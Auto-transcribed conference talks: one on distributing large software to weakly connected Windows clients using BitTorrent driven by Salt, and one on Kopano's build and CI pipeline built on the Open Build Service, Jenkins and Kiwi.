yeah, we have that request. So far we haven't solved it with Sol yet, but we could. Yeah. Okay. The big files. In fact, this talk is about big files. Also this talk is about that we, in this company, we have a very distributed in the last parts of Germany and outside of Germany, mostly Germany. And problems with this large distribution is that many, many of these networks are weak. So when you are working in data centers, or I haven't asked, who of you works in a data center then? Again, only one person. Okay. Good. So, I have to live with networks which are as bad as 10 megabits per second or even worse. And they are not really reliable. And many, many people need these slow connections. So most of the time the networks are extremely full. And then we need to distribute big software. And this obviously is a problem. The fun part is also some of these very bad locations shut down at night. So you cannot transfer it overnight. And all silly things happened. Including sending USB sticks before. Yeah. Very recently, like yesterday, there are now 700 minions running. So this is a current situation. Sorry. This is a current situation. I wanted to show my wonderful t-shirt, so I stood here. So this is the situation for the customer. He is aware that whenever he has a new software, he will wait for one day because we have to set up the mirrors. Murals meaning service copies of the copies of the repository spread out. And we think outside of Germany there are around 1,000 mirrors. Then if it's a big software, he's, the customers, used to wait for five weeks. Big software starts at 200 megabyte. He's also used to pay if it has to be quicker. And he's also used to pay if it's bigger than one gigabyte and really pay a lot. Really you cannot transfer with the current system software which is bigger than one gigabyte, which happens. What I want to achieve is to get rid of all the mirrors if the software is already at some workstations. It's enough to transfer it from there. I don't have a, I can walk. So if it's already on one client, it's enough to copy it to the others. This should be one location. And we don't no longer want to distribute the same thing four times to four workstations in a location. It should be enough to transfer it once and have the location find the optimum. And if that location is in fact nearer to another location, the second one should not even ask for the central repository, which could be more distant network-wise. So that's the idea. And as Slogan, I thought here we treat software as if it would be a material like gold or metal, we would have to transport each time from a warehouse to the destination. Whereas software really is information which can be retransmitted once I have it. I do this so explicit because it's not very complicated, but we have a very deep mindset about how to distribute software. In fact, I think all of you. I today learned about theft. I'm not sure how theft works or theft notes works, but maybe you can tell me. What I here have is distributed database kind of a repository, a distributed repository of software. And let's assume I only want the same software. Then I don't need it to copy it again from the original source. There is this one very good software already invented, which is called PewDiePierre BitTorrent Protocol, which has been adopted by, this was a Dutch company doing it in 2008. And they had around 7,000 workstations in that university, which earlier they needed four days to distribute and install all of them. And with the PewDiePierre approach, you can get rid of all these 20 mirrors, they call them distribution servers, and do it in four hours. Nice success. And somehow this company then bankrupted or defaulted, as I think it's in English. Twitter has published that they can now update their worldwide 10,000 servers in 12 seconds and no longer in 15 minutes with PewDiePierre technology. Good. Facebook, same thing, incredibly one minute for a worldwide distribution of software. You could not possibly send the same thing 10,000 times from one location. This is all good news, and it is an established technology. And the question is, why only Microsoft continues? So why is Microsoft better than the rest of the world? Do you have any idea, or can you suggest me any, yes? All sites have problems with using peer-to-peer technology due to firewalls and monitoring of firewall behavior. And this leads admins or policies at sites to be very fearful of bit torrent. Particularly in academic circles, there's a very deep distrust of PhD students and what they might be doing with bit torrent. Okay. Yes. Interesting. Good. Then one has to take that into account. In fact, that's a valid answer. Thank you. Lucky for me, no firewall so far in the world of that company has any objections against peer-to-peer traffic. And yeah, let's continue. I will give a live demo now, but I let you choose. First you see the live demo, or how it did the implementation or the integration of peer-to-peer with salt. What do you want to see first? The demo or the theory? Who's for demo? And who's for theory? More yes, and you anticipated that. That's because, and so the theory slides are in front of the live demo. So we've seen some YAML before. Again, this is YAML in the top file. I choose the top file because once I had the Python, which I show you on slide three, it was the most easiest to put it into the top file. Maybe you could write a state module, but as I'm just a simple mind, the top file works and you can tell me if it's better to put it into a state. So what you see here is we have the base configuration, a particular machine, and this is of course a long list of machines. We scrap every peer-to-peer file or a peer-to-peer payload, except, in fact, I first give the command to delete every payload which isn't on a list, which I will show you shortly, and then I will put two payloads on that machine. This is how the top file looks. First delete everything and then make sure only these two file, which are named in that state, exist and then put these two. What does that mean? Let's have a look. When I say delete everything except these ones for that machine, I have a peer-to-peer function which does exactly the same. It deletes everything which is not on that list. The idea is one day I could shorten the list and then that would be deleted. So I don't tell what has to be deleted. I tell what has to be there, which is, I don't want to say item potent. What we've heard item potent so often today, the idea of item potent. Then when I want to say that this particular file or payload, in this case it's a file, but it could also be a directory, need to be transferred by peer-to-peer. I need to give three more information apart from the name. I have to give three information. The name of the thing, the info hash which is the MD5 checksum and all the IP of the other clients which already have it or are supposed to have it. They may not have it completely. It's enough if they have a part of it. Then peer-to-peer is smart enough to get what you need. So this is questions so far? No, good. And then simply you have to implement the pisons functions. You call any peer-to-peer library you want. This works very good. And I also found it elegant that these functions instantly return. So it's not this command does not keep on running as long as it's not finished. It instantly returns with the percentage or with an error. So all these functions instantly returned. I found this useful. So now let's switch to the demo. I have a web interface. And I have the Unix shell on my master where a kind of a loop runs which I call dispatcher. So let's insert. So this payload which is 500 megabyte of static nonsense, just 500 megabyte data. Let's add four or five more clients to these 30s which already have it. I have to choose add. And now these five clients have been added. As you see, in the same moment something happens and solved is called with the list of these minions and executes a high state. Why a high state? Because I have manipulated the top file. So the top file tells just one thing. It has only one purpose to distribute files. I create the top file and the states dynamically. So this routine here creates a top file dynamically. Maybe that's very silly, but it works. So every 32nd, the command is executed again. So the first time it executes, it will just report us that it has received it for the first time. Everything has been distributed, of course. Oh, now we have a very, I didn't thought. I can make that a little bit smaller without hurting your eyes, I think. So let's put that on change settings, appearance, a little bit smaller. That's good. So what we see here is that these files have been added. And what you see here is an error. They should not be added more than once. So I apologize. I stop this loop and I have to manually create payload and the top file again. I don't know why that happens. And continue with my stupid loop. Beauty of life demo. So what we do from a salt perspective is issuing high state. And if we have set up a top file and all the SLS correctly, which we in this case didn't, then it's been done just by calling the high state. So in the background, all these minions have been trying to reach each other. 30 of them already have, and that list of IPs here includes, of course, the 30 minions which already have the files, and they are being contacted by the newcomers. And so they exchanged these files. So including that glitch, the system works reliably, I see. So we have in fact distributed a number of customer software with it. So what's not called static really is client data. So we distribute mainly GIS software. This means geo maps are big. So these things are bigger than 10 gigabytes. And either they are transferred with USB sticks or with this system. So this is preferable. Now we can admire the velocity. It's not a very high velocity. I have chosen a very low transport rate for security reasons. But what I found is that the peer-to-peer technology, once it can pass, the firewall works very reliably. So this so much for the live demo. You have now also seen the two commands which need to be executed, which in fact isn't bad. I should have shown them anyhow. First the payload SLS, the state file, must be created, and the top file must be kept actual. Somehow I wrote something bad. So we can wait for the numbers to come to 100 or you can believe me. I won't even ask you. What I've done for you is to execute a command that puts all the necessary software for the peer-to-peer client on the minions I measured how long it takes to verify that all exists. And it's about three seconds. So for all attached minions, the response of is my client. Updated takes three seconds on average. It even goes, no, it takes, sorry, 14 seconds on average. The best time is three seconds. These are the three seconds which is best. It has a good average of 15 seconds. I'm happy with 15 seconds and then all these minions which are late, they may be late for a reason. I don't care. But this was the day when I was very happy. So I had 70 clients. And they were all responding to me in 15 seconds on average. Life was good. In fact, even the more minions, the less time on average it took. So I thought, wow, salt is really scaling. I'm excited. Then yesterday, the 700 minions came and I very in short time continued the diagram. So here are the 70 which we just saw. And what I would have hoped and expected was it continues our very great average of 15 seconds. It did not. For some reason which I'm not able to find out since yesterday, it now takes a high amount of time. The more minions I use or I probe. In fact, I have a very steep slope now. I had only two seconds to ask Tom why that is. And he just asked me which version I'm using, a rather old version of salt that's 2015.5. And he suggested to use a version which where this behavior is known and fixed. I will do that. But I wanted also at this occasion to ask you, have you experienced, you all see that your minions return very, very fast and some of them slower, have you seen something like this before or do you see no growth in response time with higher numbers of minions? Joe again. Yeah, there's no easy answer. You have to really look at different kinds of problems. So if you run out of memory on the server, for example, this can easily explain those things. If a machine starts swapping out, for example, or if your network gets so saturated that the server thinks I'm confronted with the Synflat and some of the protection takes in. Good. Good answers. What you can always do is batching. So if you just switch on batching and do 10 at a time or 50 at a time, you won't have the instantaneous anymore, but you will be sure that those batches, if the server can handle 50, it will handle 100 and 1000. It will just do in batches. 50, 50, 50, 50. David? Yeah, I still can handle 700 very easily. Like Joe is saying, when you start to get into the thousands, there's a few things to look at. One is the performance of your master. If you're on a smaller server with a gigabyte of RAM, you might have to bump that up. There's a lot of settings in your master config file where you can tune it to deal with the large amount of masters and that type of thing. I've worked with a lot of customers' sites where having four or 5,000 servers is really quite simple. Good. So 700 should be fine. In fact, take this as a mistake I made, but I would like to share the findings again, so in some form of community and say, okay, the better results then should be published and we should think of a way how to do that. Also, if you see that, look at that so some kind of how you recognize a problem and how you resolve it. In fact, I would expect that we can continue on to 100 millions without any slope in response time. Thank you. On the peer-to-peer part of the presentation, the skeptical problems we already had, so this would be universities not wanting to allow peer-to-peer protocol in itself, who would be interested or who would like to know more or stay in contact or have it. Yeah, good. Maybe as a background, one of the retail customers we had actually was thinking about that back when it wasn't BitTorrent, but Eatonkey was the tool of the day. It's usually, those projects are usually stopped for those reasons that Owen mentioned, that people have this fear of peer-to-peer networks. But I know that some of the hosting providers, like Headstaff for example, have been using an R-Sync based mechanism that works very similar for years, where basically you see the machine and then other machines would just R-Sync from their peers. That has worked well. Interesting. So, another alternative that you have in a very homogeneous network is broadcasting. So that's what we do for, if you have like a whole, let's say a department store with 50 cash registers, then you can just do a multicast. The cool thing is that then you can do all the machines in 12 seconds at the same time, because on the wire it's really just one broadcast. But that wouldn't work in a distributed. It wouldn't work for these laptops which can go online and offline each second of the day and then reconnect. In fact, the company has very bad experiences with broadcasting, but it depends on the circumstances. Thank you for your attention. I'm one minute over the time. Now the party begins. We stay in contact right now. We have a look at this continued until 99 percent and it's not reported. 100 is never reported. No, really, it's not. It's not a joke. It only reports salt-wise. It's like it returns at false. What we learned today from Tom that you have this dictionary which can return the result, which is only represented when it's false. So the 99 percent is something which is wrong. 100 percent on the other hand is something which is correct and therefore it's not reported. So any more questions? Thank you very much for your attention.
Our task is to distribute software to Windows clients. Our network contains slow links and relay-servers, which must be staged up. Our goals are 1) reduce WAN traffic, 2) allow unlimited size, 3) allow unlimited number of clients in one rollout, and 4) start rollout without delay. Idea :: BitTorrent Peer-to-peer (P2P) reduces WAN traffic because if prefers local content over remote content. Beneficially for the concept, all clients are centrally configured: no peer can be a leach. Clients act as a storage resource for other clients, eliminating the need for relay servers. Realization :: We found that Salt manages a BitTorrent agent nicely with Salt-states. Experience/Result :: We have continuously distributed 2 GB per day to up to 50 Minions for over 2 months. Clients and network are undisturbed, while a Salt-Master on a regular desktop administers 50 Minions effortlessly. We fully meet all of our goals. We observe an increasing and by now high reliability with P2P and Salt (in this order), but glitches still occur in both domains. Live Demo :: How to distribute 500 MB, present at 4 clients, to 8 more clients? During transmission, we will stop the P2P service on some of these 8 clients via salt and then start it again, to simulate clients going temporarily offline. Next Steps :: Making Minions 'more active'. Activating and deactivating the P2P service on demand.
10.5446/54604 (DOI)
Okay. Yeah. Thanks for coming along. Glad to be here. I extra put my shirt with a tie on. So I really wanted to look good fashion for you. So my talk is about OBS and the real cool stuff. I must say I'm quite biased because I really love OBS and what it's capable of. And we as Copano, we were in a search of a new build system which is efficient and fulfills our requirements. And yeah, it was not hard to choose OBS in that regard. So small agenda. So I want to show you who is Copano and what we're actually doing, what our requirements were, what we did before, which is quite funny. Yeah. Why we're using OBS, what is really awesome about it and cool stuff you might not know. So I'm certain this is open to the conference, right? So a lot of developers here, most likely Adrin is also sitting somewhere and many others. I bet there are people here that know more about OBS than I do. But it's, I think, quite a good insight. And I must add that there's one thing you can call it a running gag, which I even encountered two days ago here at the conference, was like, guys, what about documentation? There's a big question mark behind it. So there's so much not really documented of OBS, which is very unfortunate. And also one of the reasons why, yeah, I try to find some ways in getting this better. Yeah, it always starts with yourself. So I offered myself here for help as well. And I think this product really deserves it. You'll see it. So yeah, we use OBS, what are requirements? So essentially, we're now in the communication world for, yeah, close over 10 years now. We're the only open source MAPI implementation in the world. And I'm talking real MAPI. So everything regarding MAPI attributes, the whole MAPI-based structure, all the MAPI attributes that you can literally set for an object, that's 100% in our solution. Our motto is like sharing and communication software for professionals. So yeah, everyone can set up a Dove Cut and just have like a Thunderbird slap to it. But traditionally, yeah, the more efficient you want to get, the more features you need as in calendaring and really professional calendaring with invites and with time zone problems that you have to come over. And I'm saying this because Copano Core, or Copano in general, is just what Serafa used to be, at least for open source. So we had quite some closed source components beforehand. And now literally almost everything is open source now, completely under AGPL. And our business model essentially, yeah, subscription based, just like Susie, just like Red Hat, nothing special here. So we provide support, professional services, test the binaries and extras. So since we exist now for 10 years, all kinds of people have, yeah, specific requirements. I mean, it's very hard to go to an environment and say, yeah, you can only sell your product potentially to one platform. Of course, that would make life easier, right, if you just provide RPMs. But we have such a diverse, yeah, diverse customer base that we literally have to come up with all kinds of funny things from Debian, of course, which is not funny, but really Rails less, Ubuntu everything, and even two special things, which is Colax and 1A. Just a question to the audience. Does anyone know here what Colax is? So does anyone know what Univention is? Okay, there's more. So Univention and Colax have some similarities. So it's an own spin of your own type of distribution. The problem is, it is not comparable from a spread perspective. Yet we do have a good partnership with Colax. And this product in general, it's not so bad, but it has its own archives, it has everything on its own. It's not using just plain based on Debian thing, so you have to do certain things to support that. And we also have one distributor in the Netherlands, actually a very good partner of ours. They, for whatever reason, don't ask me, chosen Slackware as a platform. So Slackware is like everything, put everything into tar, GZ and just unpack them to the target and you're good. So that's like CME package management. And of course, you want to build something for that as well. Our goal was to find things that we can, you know, that we don't have a build system that builds like for these platforms and these platforms and these platforms, we want to have a unified solution. So yeah, this sounds a little bit like bullshit bingo, but if you execute on this, you do quite a good job and you can deliver quite good on quality. So continuous integration as in really that you have your development steps and your process well defined and well executed, continuous delivery as in you deploy your software in such a way that when you provide a patch that it's quite available instantly. One problem that we really had was 100% reproducible builds and yeah, the ties in with the change route build environment and we want to have it scalable and fast because we seriously had scalability issues. So what do we have two years ago? And just this list doesn't look that long, but you can expect that it was heck a lot of work. So yeah, indeed, we exist now for over 10 years. So we started with SVN. And our problem is that we also have parts that are built from Windows. And the only way how you can really, yeah, control it really well is that you use SVN or at that time, I mean, I mean, get 10 years ago, think about it. And then we had really manually created change route environments. So essentially when a new release came out when rel 7 popped out of the bottom, we just made like an install, we got this change route and we executed everything in those change route builds a little bit like the principle of what OBS actually does, but just an aesthetic way. So we do it once, not with every build. That was a heck a lot of error prone. I mean, we're talking that a developer knew, oh, I just updated G-Purve tools, for instance, but he forgot one distribution. And so you got diverse results at the customer. And of course, this isn't something that you really don't want. We didn't have any repositories. Yeah, we could have provided them as an extra, extra, extra step behind all of our builds. But in our delivery, we didn't have this continuous delivery mentality. So why making repositories if you don't deliver really as you would expect nowadays? Also, what was quite a problem was that we had entirely separated builds. That is, we have a component called archiver, for instance. So archiver and core share some libraries. And when these two components are built as chronically, because they're still separate products, but same shared libraries, so when you say build this now, build archiver, and you have a core which is not released in tandem, then you could get into issues regarding changes of those libraries. Of course, this is something that you want to prevent. Yeah, for every release, we have a huge amount of manual labor that we had to do and huge checklist as well. And we had no OBS whatsoever. Also, the problem regarding OBS is a little bit aside to it. OBS loves Susie, obviously. The problem is, is that in our company, there are like two people who really do Susie-ish stuff, nobody else. And that is quite a problem too. So people, this is awesome. You really got to use it. And they say, oh, it's Susie right now. It's not that they say they don't like Susie, but they never touched it really. So there was quite some work to do there. So let's go through a little bit the requirements. Here's a little bit of an overview. I know it looks a little bit cluttered and a lot, but that's also the strength of Kapano, because it has this extreme modularity. We have customers with 50,000, 60,000 users running in parallel. And you can only make that happen by splitting up certain roles. So did you say that, for instance, that the mail delivery from Spooler and the agent are separate to different nodes, that you have your mobile devices actually on a different endpoint web server? Because, I mean, when we're talking 50,000 users concurrent, then you must know that 50,000 TCP sessions, web server, you're getting a problem. So you need to have to have this ability of distribution. The good thing about this is that everything you can see here can also run on one node easily. I mean, this can even run on an arm. Just a Raspberry Pi, fire it up, and you're good. But the problem, but the idea is, is still that you have a lot of components, and you have to have the relations to them. You have to have the shared libraries working with each other, and a binary is using them. So our requirement was we want to have something that does a lot for us, and in fact, OBS does that by essentially having automatic requires, simple visibilities, and many other mechanisms where you can really just make sure that the tags that you're using match to each other. So here we're good. Next thing was we were primarily only on the 64-bit stream, 64 and 32-bit, obviously, so I586 and I58664. But our goal was also to, yeah, be able, at least for community reasons, to provide builds for other platforms as well. Here you can see power eight, here you can see arm, you can see even mainframe. And this is actually just a snapshot that I made tonight, so yeah, not much happening tonight, but in fact, we really need this power. So there are quite some good, quite some good workers there. So architectures, yes, no problem. The next thing was we have a real communication stack, and this communication stack is defined also by single products. So for instance, we have a product called Archiver, and Archiver, you don't necessarily need. It's just something that someone needs when he's archiving. So it's literally for us, it's like a separate product. We don't say you have to install Archiver, it's not a necessity to install this component, and that's why we provide separate repositories for these. And it also allows us to have straightforward and independent release management, meaning a web app, for instance, is quite fast in development terms. So web app always receives quite fast updates, and core sometimes lacks a little bit behind in that regard. So we are able, like to release web app independently from core in a quite good way, and we wanted to have this like in a product-based scheme, because our team is quite distributed. You could compare it if you take the SUSE terminology like SUSE Linux, Enterprise Server, and high availability extension. They are also released in Tandems, but the updates are separately released. So that was also quite good. Now we come to the special requirements. Collex and Slackware, believe me, that was quite a nightmare in the beginning, but in the end it was like awesome. Then we used the whole Atlassian stack. So Atlassian is, I mean, they have great products. We use Jira, we use Confluence, we use Stash, which is now called Bitbucket, and we wanted to integrate it in a most sane way. So continuous delivery and or continuous integration is defined by the fact that when you commit something, you instantly want to know what's the result. So our code base, just to give you an idea, just core, nothing else, is 600,000 lines of code of all kinds of C++ and Python. So it is the effects that a single commit can have and can be drastic, depending on, of course, what you touch. Then we have also not yet, but we're working on that at the moment, the requirement to say we want to build images, and we don't want to use like every distribution's independent toolset for that. So we're talking here clearly Keevy, which is perfectly integrated into OBS. Also the underscore service file, which helps you a lot in versioning, so you don't have to do everything yourself, like version tagging and so on. You'll have one place to do that, and that's in your Git ripple, nowhere else. One of the requirements also was to be really, really, really, really, really fast. So just to give you an idea, we had beforehand like builds that were taking hours, and now we got them down to in the worst case scenario of 10 minutes, well, maybe 12, 13, but that's really the worst case. So normally we can make it within 500 seconds. Yeah, and do QA, that really matters. So we needed to build up a quite new chain. Also that helps us, of course, not to do everything in manual labor. There's in communication software, it's quite hard to do everything automated, because you have so many potential issues. So the checklist still exists, and you need to have it, and that's our model, essentially, so that's what you're paying a subscription for. So now I think I bored you a lot with stuff, so I want to show you a little bit how that worked out. So here on the right-hand side, you can see the commit that was necessary to be done in OBS that allows you, essentially, to pick up the build collax file, which we had here. So it's nothing super special, it's available in 2.7, but the awesome thing is that you literally just have sort of a bash script, which just executes a think of it, own type of spec file. We could have, you know, developed sort of like a compatibility to spec or a devian file, but it was simply not necessary. So the only thing that we needed to do is essentially look for the build collax file, and you can build for that. The cool thing about that is not only collax, you can do all kinds of funny things with OBS. So in the end, just the one-liner with actually adding something to be listened to, and you can go for your whole description set on how to build for that platform. Very straightforward, nothing special to do. So what do you got to do? You make a binary import, here's the link. By the way, I think documentation, this can be done a bit better. I'm thinking of documenting it from our side way better, but it's helpful. So you'll find your way, I bet. And make your local build collax file. I gave you a real-world example directly on paste open suzer work, which you can just fetch and use it. Yeah, change it to your needs, of course, if you don't want to build Copano. And the next thing was Slackware. That is, to be honest, quite a bit. The problem is that Slackware does everything in tar GZ. They don't know anything else but that. So what they do is essentially they fetch a tar, they compile it, they retar it, the result, of course, and they use literally this tar file as the binaries, and these binaries are executed to that or unpacked on that target system. In general, not that complicated. So OBS is capable of doing so. The only thing we didn't do it is for two reasons or three reasons, actually. One reason was we haven't, we checked forums, we haven't seen one request doing Slackware. So we thought might not interesting for upstream. Second thing was that we've essentially hijacked the functionality of Arch Linux in that regard. So in OBS, you have the awesome possibility of just selecting the repositories or just pointing to them on BOO. And therefore, when we, you know, heard Arch, just to get the stuff done what we want to, because we simply don't need Arch, at least not yet, and therefore we just hijacked it. So the patches that are required for that are also here. If you think you have a better idea on how to integrate it or make a separate target like a build call X, go for it. That's why I wanted to share this. Yeah, so the binary import is literally the same as with call X, just with the difference, really just take the tar GZ files. Because the patch sets also realize, oh, okay, I got unpacked them directly with tar, and I then in the end take the results, repack them, and that's the whole workflow behind it. So it's quite simple. And here below, you also have a link, which you can just simply use. With this link, you have a description, but you can just take one by one what Arch does. So we didn't have like this format thing with call X, it was quite natural because they have sort of a special packaging mechanism, just taking DPKG for instance wouldn't work for them. So therefore we decided here we can just hijack it from this other distribution. This is quite awesome to integrate with stash or a bit bucket or any name of whatever code management service that you have. So you can also integrate with subversion, we even had that like a post commit hook. So when you really want to make sure that every build that you're building, no matter in what branch, no matter in what area, you can just create a so-called post receive hook in stash. Sorry, bit bucket, it's called now. So essentially what you need to do is is just set up a curl. I have here dash dash insecure if you have a self-signed SSL certificate, you're sending up a post, and you're using a token. And this token has to be created for further hands. So this token is really awesome because you don't have to have username passwords and share them all through a round. Of course you can use that as well. So just in the URL you replace it by that. But if you want to have something like services doing your job, then you don't want to tinker around with all kinds of usernames and passwords combinations. So therefore this token is quite efficient. This is like OSC service RR, which is remote run. And essentially that's what's happening. So you're committing something, stash has a post receive hook, sends it back, and then OBS rebuilds automatically. The good thing about that is you really, yeah, that's like the first step of continuous integration. So every build that you're doing, you have your first step, everything that is done, I have a build for it. Then the next step for us is Jenkins. So in our opinion, you cannot, I mean, we used Jenkins beforehand, by the way. So we had change routes, static change routes. We inserted all the builds there. So the source code that we made was like packed, was sent to one of the nodes, and it was unpacked, compiled, results we got, and UPIA. So Jenkins is very powerful, but it lacks certain areas, like the scalability, yes, you can add worker nodes to it as well. But it's not really the same like OBS, because you have to set up all your sources, everything, you have to manually set up every distribution for your own, and that's just, in our opinion, was stupid. So in the end, integrating with Jenkins was for us the next step. So we have code, we have the builds, but what happens next? And what happens next is that we just wanted to make sure that, for instance, unit tests, and in the beginning unit tests, I'm coming to that later, and Selenium, for instance, because we also have Web App, a lot of JavaScript there. So we wanted to have sort of a hook, or we were looking for sort of a hook, which can, when you have published builds successfully built, that they take the next step. So that's step three, essentially. In Jenkins, you create your job, you create a build token there that's built in, nothing special to do, you can just search for a token there, and in a job which you want to create. And then in userlib OBS server BS config, just add this line for all the repos that you have. So it's literally just an array, so you can add as many as you want to. That's just an example here. And you can create your reference job, of course, you can make that parameterized, I mean, developers can do whatever they want to, but this is just an example to say, hey, in the end, I'm just doing a curl request, and this curl request is sent to Jenkins. So we've been thinking around quite a lot of time because we were thinking, like, yeah, you can just monitor the OBS build, right? So you can just OSCR, see what's going on, and just wait. But that's like more polling principle, and we don't like polling, we think an event is way more efficient and doesn't use that many resources, and just makes things also less error prone. So that was the way how we did it. Yeah, next thing, what do you do when you have everything in your Jenkins which you can trigger all sorts of tests on, you also want to make sure that you have images. So the cool thing is, it's a no-brainer, actually. You can just take, like, the standards.kivi files that are in the GitHub repository, which you can see here. So there are a lot of standard templates that you can use for REL and for OpenSuzia. And they are, yeah, you sometimes have to change when you have your own private instance, you have to change the URLs because they just point to OBS repositories. But if you, in fact, have multiple times like the same product, then you don't want to use it like that way, you just want to specify a certain project or a certain package in a project. And therefore, it makes sense to specifically look at the repositories area in your kivi XML. I just learned here at the conference, actually, that Jan Blank, who was busy with a live build on OBS integration, which is super awesome because we've been looking for that. So this is one of our next things that is on the list to really make also Debian and Ubuntu images. And therefore, we have all major players, right? So that helps us, of course, to transport the product that we have in an easy-same way because kivi gives you a lot of possibilities also to integrate, like, logic in terms of conflicts that you want to deploy. For instance, using Copano with a standard MySQL isn't yet works, but it's not a good idea because you have many ways to improve performance just by adding two or three parameters. And you have, like, magnitudes of better performance without any danger data endangerment. So the next thing was, obviously, for the trigger to run, you should use service files. And I must say, from what I see also on BOO, I'm quite astonished that service is not really used that much, though it's such a great architecture. So it's plug-able, literally. You have all these TAR, like TAR-SCM and recompress. You have all these service projects in GitHub, which are really great. And you can just add a service name one after another by a block. And here you can see a real example, except for a username and password. Here you can see really everything that we're doing. So we get master revision for every build that we're doing. Of course, we're not releasing master directly to the public as a release. So we have other jobs where it's tagged specifically, where we set, like, the correct tag that should be checked out. And of course, recompressing it, set, use XZ for size, and set version, which is, by the way, really awesome. Also, the changes that I showed you regarding 1A and Colax, they also can support set version, which is really good because it just gets, like, the version numbering that you have from your source code management tool. And it just sets that dynamically for your DSC file, spec file, build Colax file, whatever you have. The next thing was that's a little bit the convincing part, where, like, yeah, OSC, OSC, that's open Susie, commander. And not saying that in our company we don't like open Susie, or that there's anyone who doesn't like it, but they simply don't know. And the first thing was, like, yeah, what is OSC? I don't know it. I haven't touched it. And the excuse was, yeah, that's open Susie, right? I don't have an endabian. So there's no excuses, essentially. And I have to apologize. This is a Windows laptop here. So I, because we're in communication world and communication world, Outlook is also a deal. So there you go. But you can easily get OSC even to run on Windows with Sigwin. The only thing with what I recommend you to do is really follow this how-to because the native installed Python that you have with Sigwin at the moment, at least, is without SSL support. So the PyCurl there is without SSL support. And that's obviously not a good idea. Yeah. So with these instructions, you can get started. Yeah. Be fast. Very, very fast. So I mentioned when you do build for every commit and you have a lot of developers, then you want to make sure that your builds are fast. The cool thing about that and really awesome point is you can kill everything in OBS with hardware. So it's slow and you have a lot of builds. You have a lot of distributions. You've seen a list that we have beforehand. Then you must know every distribution. Every architecture means rebuilt from scratch. Rebuilt the full operator or reinstalled the full operating system. Put your artifacts in there, compile it, get the build results, push them. And that for every distribution. So every commit that is issued at Copano generates 25 from scratch compilations of 600,000 lines of code. You need hardware for that. So one of the things that we actually did was really to build everything in tempFS that works quite well. The only thing what we also realized because Serafa and Copano, we are also involved in the iridium project. That's a spin off of the Chromium browser, which is just very secure. But we're talking here huge source code and this size isn't enough anymore. So 64 gigabytes or 60 gigabytes is not enough there anymore. But for us, of course, that's also cool. And you can tune it actually because every worker has, like when you have a system, let's say 16 cores, you could say, let's take eight workers running there. And that means at full load, literally every job would have full two CPUs available. And you can see how much size you're using literally because it's just like checking out your DF output on how much is really used at that time. And then you can tune it and see how much tempFS you actually really need because you don't really need it all the time. But of course, you're installing the full distro in there. And therefore you need some size. Also, since we have some separated worker nodes, so they're not all at one location, really use OBS cache here in cache size. It really helps specifically for not super bandwidth locations. So that is really, really good. And the footprinting and the checks summing, we never have issues with that. So I really recommend to do that. And what we also did is we did some benchmarks regarding overcomitting. So to give you back the idea, we had these 10 nodes, I think. Every node has with us, I think, these 16 cores. And we have eight workers on there. So potentially thinking two CPUs for each and every. So you would say, yeah, make J2 or so, and then you have a full load. But that's quite stupid. Because when you say that you only have one or two single rebuilds, that you say a developer is just checking something out for a specific platform, just want to see the current log of it. And he can make a specific target rebuild for only one distribution. And then that node would just utilize two CPUs, even though it would be available potentially on which node it is distributed. Therefore, just make a full, make J with all the worker CPU counts that you have brought. And yeah, just let them fight for CPU cycles. In the end, the benchmarks look very good. So in total, you win. Yeah. Do Q8, that matters? So we had the thing regarding unit tests. So we have quite an amount of it. Because MAPI is a very complicated description of technology. Let's call it that. So MAPI with time zone issues, with all kinds of MAPI properties, with all kinds of operations, like deleting, moving, it is necessary, absolutely, that you have a lot of time zones. It is necessary, absolutely, that you have unit tests for a product like that. Therefore, our idea is to make the make test happen on OBS workers as well, because that scales super well. And also, with these tests, you also take all the components and all the dependencies of that certain distribution into account. So beforehand, we did like, yeah, one node or one Jenkins job, do the unit tests in there. And it was Devian based, or it is Devian based actually, still. And then you fire it off. And then you know, yeah, my unit tests are working on Devian. But you don't know if they're working on SUSE. You don't know if they're working on Red Hat. That's just, doesn't make sense. Yeah. The example that I already brought, integrated with a published hook, that is really, really the best. It's so awesome, because you can really make sure that you're not missing out on any commit. And you get the results for every commit. Of course, you have to hit it by hardware. But in the end, if quality gains from that, and actually developers also learn from that, because in the beginning, we had also issues where like, there were like 10, 20 commits in the meanwhile happening. And then we're thinking like, hey, damn it, we touched that three times, which commit is it now, which is fucking up literally the test. So the point is, if you have that for every build, you are increasing quality. And your developers are also learning from it, because they really pinpoint and you're saving time in the end also. And yeah. So Kiwi is also what is very, very much not perceived really well is. We had also with this whole Serafa and Copano thing, where we essentially all the services are now Copano named. We had the issue with upgrading and having dependency issues, from package to package to package. So what we had was essentially, we installed like 80% everything correct in the beginning. And then we realized, oh, damn it, they're like two or three older packages actually. But they are not included really well. And they ask for dependencies, because we also sort of have to have manual references or manual requires in a spec files. So Kiwi is a perfect automation tool for all your installations. So if you want to install something and you define like just your target, we have a meta package called Copano server packages. If you just want to install that and you know that your build is running, then you know you have no dependency issues, because it's installing. So therefore no install issues whatsoever. Of course, you can take it forward that you say, what is with the next version? If you change like a library to be contained in a different package, then you have to think of, hmm, then I have to have upgrade tests as well. Coming to that later. So yeah, Open QA is there. And it is really great. We really took our time to look at it. But for us, it is really like this, making a screenshot, comparing a screenshot with another. It works in many cases, but not the ones that are important for us at least. So we actually evaluate our test output. And this output is for us quite important. So we make a little bit magic around that. And we just rate that for us at least way more efficient. Not saying that Open QA is bad. Really, I don't want to say that, but for us, it was not a perfect match. So do platform related tests is also a very, very good and important thing. We also Jenkins thought like, yeah, let's just do the unit tests initially, as I mentioned. And one of the facts that were left behind is also PHP, because PHP also different major versions. And with this broad number of all kinds of different distributions, you have to make sure that the unit tests also run on every platform. So everything that is depending or platform related is something that OBS can entirely make work for you. And also, which is quite nice, the published hook, which I already mentioned that I love it, it also works for everything that is QV related. So to get the full chain, developer commits something. When a developer commits something, OBS automatically picks it up because we have this hook that the build system OBS starts. OBS uses underscore service files to automatically grab it from the source, from the SEM, from our kit, and automatically deploys it on a worker, rebuilds it. When it's rebuilt, it automatically tells Jenkins, hey, guy, you have something to do in parallel. It also tells OBS, by the way, I have a new package for this, and I want to have an image of it. So Jenkins is one bulk part where we put all the other QA jobs into it. Here I go. Here we have everything that is regarding non-OBS QA related jobs, and there are some. For instance, we use Valorgrind also. And Valorgrind running on a non-realistic system that you really footprinting or so just simply doesn't make any sense. So therefore, you have this full chain, developer commits something. OBS takes on it. Jenkins is notified, hey, we have something new. Jenkins is also, by the way, the guy who takes care of all the translations. So when somebody translates something, we have a job that just recurrently picks up all the translations, puts them into a big bucket back in a separate branch, and the developer can just merge it. So in the end, here with Jenkins taking the next steps, we have this non-OBS QA jobs, which simply don't make sense 